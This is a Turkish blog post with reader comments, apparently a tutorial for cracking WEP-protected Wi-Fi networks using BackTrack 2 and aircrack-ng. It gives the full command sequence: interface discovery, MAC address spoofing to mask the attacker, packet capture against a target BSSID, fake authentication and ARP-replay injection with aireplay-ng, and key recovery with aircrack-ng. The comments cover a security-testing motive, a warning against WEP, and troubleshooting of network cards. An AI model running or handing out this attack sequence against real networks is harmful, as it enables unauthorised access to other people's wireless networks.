WLAN Hack/Crack Linux BackTrack2 (WEP)

Linux BackTrack II live cd linux dağıtımını cd ye yazıp laptopumuza takıyoruz. Bilgisayarımızı cd’ den boot edip logon ekranında root kullanıcı adı toor şifresi ile login oluyoruz.

1. Adım:

Komut satırını açıyoruz

iwconfig

komutunu girip wireless ethernetin hangi interface oldugunu öğreniyoruz.

Not: Ben burada eth0 olduğunu kabul edeceğim ve ona göre komutları gireceğim.

2. Adım:

airmon-ng stop eth0
ifconfig eth0 down
macchanger –mac 00:11:22:33:44:55 eth0
airmon-ng start eth0

3. Adım:

airodump-ng eth0

Not: Ctrl+c tuşuna basıp komutu durdurup bssid’ yi kopyalıyoruz

airodump-ng -c 11 -w test –bssid 00:17:3F:4A:E1:EA eth0

Not: -c’ den sonra kanal numarası ne ise o yazılıyor ben burda örnekolarak 11′ i kullandım bssid’ den sonra kopyaladığımız bssid’ yi yapıştırıyoruz.

4. Adım:

Yeni bir komut satırı açıyoruz

aireplay-ng -1 0 -e mrouter -a 00:17:3F:4A:E1:EA -h 00:11:22:33:44:55 eth0

Not: ilk bssid kopyalığımız ikincisi ise maskelemek için kullanduğımız

5. Adım:

Yeni bir komut satırı daha açıyoruz

aireplay-ng -3 -b 00:17:3F:4A:E1:EA -h 00:11:22:33:44:55 eth0

Not 1: ilk bssid kopyalığımız ikincisi ise maskelemek için kullanduğımız

Not 2: 500 paket elde edildikten sonra 4. Adımı tekrarlıyoruz

6. Adım:

Yaklaşık 100.000 paket sniff ettikten sonra aşağıdaki komutu çalıştırıyoruz

aircrack-ng *.cap

64 bit şifre için aşağıdaki komutu kullanbilirsiniz

aircrack-ng -0 –n 64 *.cap

Bu denemede kullanılan wireless ethernet kartı Intel 2200bg’ dir ve deneme linux ortamında başarılı olmuştur.  Ayrıca kullanılan şifreleme yöntemi WEP’ tir.

8 thoughts on “WLAN Hack/Crack Linux BackTrack2 (WEP)

  1. teşekkürler bora yıldız yada bu dökümanı oluşturan her kimse.. yöntem gayet hızlı ve başarılı bir şekilde çalışıyor…

  2. Aslında bana ağ güveliğinin testi için gerekliydi bu adımlar. Ancak araştırma yaptığımda bulduğum bilgiler parça parça birbiriyle bağlantısızdı. Sadece biraz derleyip toparladım.

    Çıkarabileceğimiz tek sonuç Wireless güvenliği için WEP şifrelemesi kullanmamaktır.

  3. yazınızda intel işlemcili ağ kartıyla yapıldığını söylemişsiniz. fakat intel kartla deneyen arkadaşım başarılı olamamış. kullandığımız ağ kartının yada karşı tarafın kullandığı ağ kartının bu işleme bi etkisi olabilir mi? yada modemin?

  4. aslına bakarsanız çok fazla değişken var

    öncelikle atak yaptığınız ağ wep şifresi ile korunuyor olmalı bunun yanında wireless üzerinde trafik olmalı ki paket toplamalısınız. Bir de kullanılan şifleme 64 bit değil 128 bit ise komut satırından bir tanesi değişecek ve toplayacağınız paket sayısı artacak.

    intel kartların back injection özelliği kazanabilmesi için linux backtrack kullanmalıyız. eğer karşı tarafta trafik varsa ve siz yeterli paket toplayabildiyseniz şifreyi kıramamak için nedeniniz yok

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.